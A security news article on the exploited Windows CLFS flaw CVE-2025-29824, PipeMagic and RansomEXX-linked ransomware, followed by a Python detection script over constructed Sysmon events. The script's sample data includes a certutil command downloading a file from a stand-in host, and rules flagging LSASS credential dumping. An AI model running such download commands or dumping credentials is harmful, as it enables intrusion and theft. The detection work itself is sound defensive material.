In recent news, Microsoft has disclosed that a security vulnerability affecting the Windows Common Log File System (CLFS) was exploited by threat actors in ransomware attacks targeting specific organizations. These targets include entities in the information technology (IT) and real estate sectors in the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in Saudi Arabia.
The specific vulnerability, identified as CVE-2025-29824, is a privilege escalation flaw within CLFS that could be used to achieve SYSTEM privileges. Fortunately, Microsoft released a patch for this vulnerability as part of its Patch Tuesday update for April 2025, effectively addressing the issue.
Microsoft tracks the threat activity exploiting CVE-2025-29824 as Storm-2460. The actors use a malware family called PipeMagic to deliver the exploit and subsequently deploy ransomware payloads, and have been observed using the certutil utility to download malware from a compromised third-party site as part of their tactics.
The malware involved in these attacks is an MSBuild file containing an encrypted payload that unpacks and executes PipeMagic, a trojan detected in the wild since 2022. Interestingly, this is not the first time PipeMagic has been associated with Windows zero-day vulnerabilities, as a previous flaw (CVE-2025-24983) was also exploited using this malware.
It’s worth noting that Windows 11, version 24H2, is not vulnerable to the exploitation of CVE-2025-29824: access to certain System Information Classes within NtQuerySystemInformation is restricted to users holding SeDebugPrivilege, so only admin-like users can obtain the information the exploit relies on, which prevents exploitation from an unprivileged context.
Following successful exploitation of the vulnerability, the threat actors dump LSASS memory to extract user credentials and then encrypt files on the system, appending random extensions to the encrypted files. While Microsoft was unable to analyze a ransomware sample from these attacks, the ransom note left behind indicated a connection to the RansomEXX ransomware family.
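The chain described above (certutil download, MSBuild loader, LSASS credential dumping) can be surfaced from endpoint telemetry. The following is an added example, not code from the original article or from Microsoft's report: a small Python correlation over constructed Sysmon-style events (Event ID 1 process creation, Event ID 10 process access) that flags certutil fetching remote content, MSBuild running a file certutil just downloaded, and a non-system binary reading LSASS memory. Field names follow Sysmon conventions; the paths and URL are invented sample values.

```python
import re
from typing import Dict, List

# Constructed Sysmon-style events (not real telemetry) modelled on the chain the
# article describes: certutil fetches a file from a remote site, MSBuild is then
# launched on that file, and later an unexpected process reads LSASS memory.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventId": "1", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://compromised.example/upd C:\Users\Public\upd.proj"},
    {"EventId": "1", "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r"MSBuild.exe C:\Users\Public\upd.proj"},
    {"EventId": "1", "Image": r"C:\Windows\System32\svchost.exe",      # benign control event
     "CommandLine": "svchost.exe -k netsvcs"},
    {"EventId": "10", "Image": r"C:\Users\Public\helper.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Windows paths of the form X:\...; used to recover certutil's output file and MSBuild's input file.
PATH_RE = re.compile(r"[A-Za-z]:\\[^\s\"']+")
PROCESS_VM_READ = 0x10  # access right needed to read another process's memory

def analyze(events: List[Dict[str, str]]) -> List[str]:
    """Return alert strings; correlates certutil downloads with later MSBuild executions."""
    alerts: List[str] = []
    downloaded: set = set()  # lower-cased paths certutil wrote to disk
    for ev in events:
        image = ev.get("Image", "").lower()
        cmd = ev.get("CommandLine", "")
        if ev.get("EventId") == "1" and image.endswith("\\certutil.exe") and URL_RE.search(cmd):
            alerts.append(f"certutil fetched remote content: {URL_RE.search(cmd).group(0)}")
            downloaded.update(p.lower() for p in PATH_RE.findall(cmd))
        elif ev.get("EventId") == "1" and image.endswith("\\msbuild.exe"):
            # MSBuild on a file certutil just pulled down is the loader step, not a normal build.
            for p in PATH_RE.findall(cmd):
                if p.lower() in downloaded:
                    alerts.append(f"MSBuild executed a certutil-downloaded file: {p}")
        elif ev.get("EventId") == "10" and ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
            access = int(ev.get("GrantedAccess", "0"), 16)
            if access & PROCESS_VM_READ and not image.startswith("c:\\windows\\system32"):
                alerts.append(f"LSASS memory read by {ev['Image']} (access {ev['GrantedAccess']})")
    return alerts

if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
```

The certutil-to-MSBuild correlation is what keeps the MSBuild rule quiet on ordinary developer builds; a standalone "MSBuild ran a project file" rule would be far noisier.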
In conclusion, Microsoft emphasized the value that threat actors place on post-compromise elevation of privilege exploits, as these can enable them to escalate initial access and pivot to privileged access within targeted environments. This escalation ultimately facilitates the widespread deployment of ransomware, underscoring the need for robust cybersecurity measures to defend against such threats.
As the cybersecurity landscape continues to evolve, it is crucial for organizations to stay vigilant and implement comprehensive security protocols to mitigate the risk of falling victim to ransomware attacks and other advanced threats. Stay tuned for more updates on this developing story.